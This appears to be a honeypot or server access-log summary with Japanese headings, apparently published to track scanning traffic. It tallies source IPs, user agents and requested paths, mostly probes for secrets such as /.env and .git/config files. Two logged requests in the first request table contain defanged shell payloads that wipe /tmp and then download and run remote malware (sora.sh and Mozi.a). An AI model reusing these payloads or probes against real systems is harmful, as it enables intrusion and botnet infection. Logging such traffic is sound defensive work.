1 185.170.144.3 Estonia
1 192.155.90.118 United States
1 192.241.214.40 United States
1 192.241.231.47 United States
2 198.235.24.25 United States
1 218.145.61.20 South Korea

UserAgent一覧

件数 UserAgent
8 'Cloud mapping experiment. Contact research@pdrlabs.net'
39 -
2 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
17 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
6 Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z73802194750Q1
6 Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)
1 Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
4 Mozilla/5.0
1 python-requests/2.28.1
1 xxx

リクエスト内容一覧

件数 Method Request Protocol
2 \x03
2 \x16\x03\x01\x01H\x01
3 \x16\x03\x01\x01\x07\x01
26 \x16\x03\x01
1 CONNECT api[.]ipify[.]org:443 HTTP/1.1
1 CONNECT eth0[.]me:443 HTTP/1.1
1 CONNECT fingerprints[.]bablosoft[.]com:443 HTTP/1.1
2 CONNECT ip[.]bablosoft[.]com:443 HTTP/1.1
1 CONNECT v4[.]ident[.]me:443 HTTP/1.1
3 GET ../../proc/ HTTP
1 GET /+CSCOE+/logon.html HTTP/1.1
26 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/.git/config HTTP/1.1
1 GET /admin/index.html HTTP/1.1
1 GET /app/.git/config HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
4 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi-bin/login.cgi HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /index.html HTTP/1.1
1 GET /login.jsp HTTP/1.1
1 GET /logon.htm HTTP/1.1
1 GET /manage/account/login HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+114[.]67[.]217[.]170/sora.sh;chmod+777+*;sh+sora[.]sh HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//102[.]33[.]11[.]159:34741/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /vendor/.git/config HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
1 GET http[:]//api[.]ipify[.]org?Z73802194750Q1 HTTP/1.1
1 GET http[:]//eth0[.]me?Z73802194750Q1 HTTP/1.1
1 GET http[:]//fingerprints[.]bablosoft[.]com/ip?Z73802194750Q1 HTTP/1.1
2 GET http[:]//ip[.]bablosoft[.]com/?Z73802194750Q1 HTTP/1.1
1 GET http[:]//v4[.]ident[.]me?Z73802194750Q1 HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /api/v0/id HTTP/1.1
2 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
2 3.133.85.124 United States
2 20.150.201.61 United States
2 34.83.143.35 United States
1 45.79.172.21 United States
1 45.79.181.104 United States
1 45.142.182.76 Germany
2 51.158.37.186 France
12 54.36.115.221 France
3 54.37.79.75 France
6 57.129.23.166 France
1 62.233.50.179 Russia
1 64.62.197.231 United States
13 64.227.129.108 United States
4 68.69.186.30 United States
2 78.153.140.221 Russia
2 83.97.73.87 Germany
1 91.92.243.232 Bulgaria
8 95.214.235.169 Ukraine
1 104.236.128.33 United States
1 139.59.101.104 Singapore
1 149.102.130.210 United States
2 167.71.209.152 United States
2 167.94.138.36 United States
2 167.94.146.58 United States
1 172.104.11.4 United States
1 172.104.11.34 United States
1 172.104.11.46 United States
1 172.105.128.11 United States
1 172.233.57.47 United States
2 183.136.225.42 China
3 184.105.139.70 United States
4 185.142.236.36 Seychelles
1 192.155.90.118 United States
3 192.155.90.220 United States
1 198.199.92.46 United States
2 198.235.24.135 United States
2 198.235.24.211 United States

UserAgent一覧

件数 UserAgent
34 -
1 BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
30 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
3 Mozilla/5.0
1 curl/7.81.0
1 curl/8.1.2
1 python-requests/2.28.1

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\x07\x01
20 \x16\x03\x01
5 GET ../../proc/ HTTP
32 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/.git/config HTTP/1.1
1 GET /blog/.git/config HTTP/1.1
1 GET /bundle.js HTTP/1.1
2 GET /cdn-cgi/trace HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /upl.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
2 PRI * HTTP/2.0